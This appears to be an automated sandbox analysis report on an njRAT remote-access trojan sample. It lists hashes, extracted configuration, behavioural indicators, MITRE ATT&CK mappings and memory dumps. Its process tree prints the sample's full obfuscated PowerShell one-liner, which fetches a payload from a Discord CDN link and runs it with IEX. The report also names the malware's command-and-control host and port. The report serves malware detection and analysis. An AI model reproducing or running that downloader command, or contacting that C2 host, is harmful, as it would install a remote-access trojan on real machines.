njrat | a88a9fc866e2da0a88fbbf44e23b39b3bb980135b0d1c1aafbbef87490c2f34c

General

Target

RFQ-474552121.vbs
Size

15KB
MD5

147841ac2ca60229a754403fddad59ec
SHA1

9de7705976aec4bedd6f8805065ac17be1282d75
SHA256

a88a9fc866e2da0a88fbbf44e23b39b3bb980135b0d1c1aafbbef87490c2f34c
SHA512

92be569b47e9a8445bfb62b44b3bf3a1116b528520a958f037967f16a0746f9ff6c23ceab63c1d7159565e20656cdf193c768323efa0e151f407b9775516f4b4

Score

10^/10

njrat ------(xxx)------trojan

Malware Config

Extracted

Family

njrat

Version

v2.0

Botnet

------(XxX)------

C2

new.libya2020.com.ly:2020

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 2264 powershell.exe
Executes dropped EXE 4 IoCs

Processes:

update.exeupdate.exeupdate.exeupdate.exe

pid process

2204 update.exe
2216 update.exe
1700 update.exe
3672 update.exe
Drops startup file 1 IoCs

Processes:

update.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk update.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

update.exe

description pid process target process

PID 2204 set thread context of 1700 2204 update.exe update.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exeupdate.exe

pid process

2264 powershell.exe
2264 powershell.exe
2264 powershell.exe
2204 update.exe
2204 update.exe

flow	pid	process
9	2264	powershell.exe

pid	process
2204	update.exe
2216	update.exe
1700	update.exe
3672	update.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	update.exe

description	pid	process	target process
PID 2204 set thread context of 1700	2204	update.exe	update.exe

pid	process
2264	powershell.exe
2264	powershell.exe
2264	powershell.exe
2204	update.exe
2204	update.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeIncreaseQuotaPrivilege	2264	powershell.exe
Token: SeSecurityPrivilege	2264	powershell.exe
Token: SeTakeOwnershipPrivilege	2264	powershell.exe
Token: SeLoadDriverPrivilege	2264	powershell.exe
Token: SeSystemProfilePrivilege	2264	powershell.exe
Token: SeSystemtimePrivilege	2264	powershell.exe
Token: SeProfSingleProcessPrivilege	2264	powershell.exe
Token: SeIncBasePriorityPrivilege	2264	powershell.exe
Token: SeCreatePagefilePrivilege	2264	powershell.exe
Token: SeBackupPrivilege	2264	powershell.exe
Token: SeRestorePrivilege	2264	powershell.exe
Token: SeShutdownPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeSystemEnvironmentPrivilege	2264	powershell.exe
Token: SeRemoteShutdownPrivilege	2264	powershell.exe
Token: SeUndockPrivilege	2264	powershell.exe
Token: SeManageVolumePrivilege	2264	powershell.exe
Token: 33	2264	powershell.exe
Token: 34	2264	powershell.exe
Token: 35	2264	powershell.exe
Token: 36	2264	powershell.exe
Token: SeIncreaseQuotaPrivilege	2264	powershell.exe
Token: SeSecurityPrivilege	2264	powershell.exe
Token: SeTakeOwnershipPrivilege	2264	powershell.exe
Token: SeLoadDriverPrivilege	2264	powershell.exe
Token: SeSystemProfilePrivilege	2264	powershell.exe
Token: SeSystemtimePrivilege	2264	powershell.exe
Token: SeProfSingleProcessPrivilege	2264	powershell.exe
Token: SeIncBasePriorityPrivilege	2264	powershell.exe
Token: SeCreatePagefilePrivilege	2264	powershell.exe
Token: SeBackupPrivilege	2264	powershell.exe
Token: SeRestorePrivilege	2264	powershell.exe
Token: SeShutdownPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeSystemEnvironmentPrivilege	2264	powershell.exe
Token: SeRemoteShutdownPrivilege	2264	powershell.exe
Token: SeUndockPrivilege	2264	powershell.exe
Token: SeManageVolumePrivilege	2264	powershell.exe
Token: 33	2264	powershell.exe
Token: 34	2264	powershell.exe
Token: 35	2264	powershell.exe
Token: 36	2264	powershell.exe
Token: SeIncreaseQuotaPrivilege	2264	powershell.exe
Token: SeSecurityPrivilege	2264	powershell.exe
Token: SeTakeOwnershipPrivilege	2264	powershell.exe
Token: SeLoadDriverPrivilege	2264	powershell.exe
Token: SeSystemProfilePrivilege	2264	powershell.exe
Token: SeSystemtimePrivilege	2264	powershell.exe
Token: SeProfSingleProcessPrivilege	2264	powershell.exe
Token: SeIncBasePriorityPrivilege	2264	powershell.exe
Token: SeCreatePagefilePrivilege	2264	powershell.exe
Token: SeBackupPrivilege	2264	powershell.exe
Token: SeRestorePrivilege	2264	powershell.exe
Token: SeShutdownPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeSystemEnvironmentPrivilege	2264	powershell.exe
Token: SeRemoteShutdownPrivilege	2264	powershell.exe
Token: SeUndockPrivilege	2264	powershell.exe
Token: SeManageVolumePrivilege	2264	powershell.exe
Token: 33	2264	powershell.exe
Token: 34	2264	powershell.exe
Token: 35	2264	powershell.exe
Token: 36	2264	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeupdate.exe

description	pid	process	target process
PID 4008 wrote to memory of 2264	4008	WScript.exe	powershell.exe
PID 4008 wrote to memory of 2264	4008	WScript.exe	powershell.exe
PID 2264 wrote to memory of 2204	2264	powershell.exe	update.exe
PID 2264 wrote to memory of 2204	2264	powershell.exe	update.exe
PID 2264 wrote to memory of 2204	2264	powershell.exe	update.exe
PID 2204 wrote to memory of 2216	2204	update.exe	update.exe
PID 2204 wrote to memory of 2216	2204	update.exe	update.exe
PID 2204 wrote to memory of 2216	2204	update.exe	update.exe
PID 2204 wrote to memory of 1700	2204	update.exe	update.exe
PID 2204 wrote to memory of 1700	2204	update.exe	update.exe
PID 2204 wrote to memory of 1700	2204	update.exe	update.exe
PID 2204 wrote to memory of 1700	2204	update.exe	update.exe
PID 2204 wrote to memory of 1700	2204	update.exe	update.exe
PID 2204 wrote to memory of 1700	2204	update.exe	update.exe
PID 2204 wrote to memory of 1700	2204	update.exe	update.exe
PID 2204 wrote to memory of 1700	2204	update.exe	update.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ-474552121.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/901770008810618905/902212483350147082/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2264

C:\Users\Public\update.exe
"C:\Users\Public\update.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2204

C:\Users\Public\update.exe
"C:\Users\Public\update.exe"
4⤵
- Executes dropped EXE
PID:2216

C:\Users\Public\update.exe
"C:\Users\Public\update.exe"
4⤵
- Executes dropped EXE
- Drops startup file
PID:1700

C:\Users\Public\update.exe
C:\Users\Public\update.exe
1⤵
- Executes dropped EXE
PID:3672

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\update.exe.log
MD5
4c216576d61fc2669127bdcfd65f3e80

SHA1
f6c81ff3750b4395b396e11c973513d8c93e1923

SHA256
f3bfc99c6011fca98d8ff8738c07ff50f44056ee63a2754b8a85e26a4805ed4d

SHA512
e765ab3f927f799404a1d4c185ab9cd7a458f2b642cca83812db3dba08196fb7f99f417013b37868592be3e3962a18e1f19004623a85f534610100352dd92f36

Download Submit
C:\Users\Public\update.exe
MD5
289bce792735d436f48355e55ea0276f

SHA1
1438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8

SHA256
78b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b

SHA512
f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2

Download Submit
C:\Users\Public\update.exe
MD5
289bce792735d436f48355e55ea0276f

SHA1
1438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8

SHA256
78b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b

SHA512
f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2

Download Submit
C:\Users\Public\update.exe
MD5
289bce792735d436f48355e55ea0276f

SHA1
1438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8

SHA256
78b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b

SHA512
f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2

Download Submit
C:\Users\Public\update.exe
MD5
289bce792735d436f48355e55ea0276f

SHA1
1438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8

SHA256
78b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b

SHA512
f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2

Download Submit
C:\Users\Public\update.exe
MD5
289bce792735d436f48355e55ea0276f

SHA1
1438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8

SHA256
78b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b

SHA512
f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2

Download Submit
memory/1700-180-0x0000000005DC0000-0x0000000005DC1000-memory.dmp

Filesize
4KB

Download
memory/1700-173-0x000000000040839E-mapping.dmp

Download
memory/1700-172-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1700-183-0x0000000005FD0000-0x0000000005FD1000-memory.dmp

Filesize
4KB

Download
memory/2204-169-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/2204-168-0x0000000004E80000-0x0000000004E87000-memory.dmp

Filesize
28KB

Download
memory/2204-167-0x0000000004B00000-0x0000000004FFE000-memory.dmp

Filesize
5.0MB

Download
memory/2204-166-0x0000000004E40000-0x0000000004E41000-memory.dmp

Filesize
4KB

Download
memory/2204-158-0x0000000000000000-mapping.dmp

Download
memory/2204-170-0x0000000005770000-0x0000000005799000-memory.dmp

Filesize
164KB

Download
memory/2204-165-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/2204-164-0x0000000004A60000-0x0000000004A61000-memory.dmp

Filesize
4KB

Download
memory/2204-162-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/2264-125-0x00000261A53A0000-0x00000261A53A1000-memory.dmp

Filesize
4KB

Download
memory/2264-160-0x000002618B1F0000-0x000002618B1F2000-memory.dmp

Filesize
8KB

Download
memory/2264-149-0x00000261A5218000-0x00000261A521A000-memory.dmp

Filesize
8KB

Download
memory/2264-132-0x00000261A5216000-0x00000261A5218000-memory.dmp

Filesize
8KB

Download
memory/2264-131-0x00000261A5213000-0x00000261A5215000-memory.dmp

Filesize
8KB

Download
memory/2264-130-0x00000261A5210000-0x00000261A5212000-memory.dmp

Filesize
8KB

Download
memory/2264-126-0x000002618B1F0000-0x000002618B1F2000-memory.dmp

Filesize
8KB

Download
memory/2264-117-0x0000000000000000-mapping.dmp

Download
memory/2264-124-0x000002618B1F0000-0x000002618B1F2000-memory.dmp

Filesize
8KB

Download
memory/2264-123-0x000002618B1F0000-0x000002618B1F2000-memory.dmp

Filesize
8KB

Download
memory/2264-122-0x00000261A51E0000-0x00000261A51E1000-memory.dmp

Filesize
4KB

Download
memory/2264-121-0x000002618B1F0000-0x000002618B1F2000-memory.dmp

Filesize
8KB

Download
memory/2264-120-0x000002618B1F0000-0x000002618B1F2000-memory.dmp

Filesize
8KB

Download
memory/2264-119-0x000002618B1F0000-0x000002618B1F2000-memory.dmp

Filesize
8KB

Download
memory/2264-118-0x000002618B1F0000-0x000002618B1F2000-memory.dmp

Filesize
8KB

Download
memory/3672-190-0x00000000049C0000-0x0000000004EBE000-memory.dmp

Filesize
5.0MB

Download

Analysis

Sharing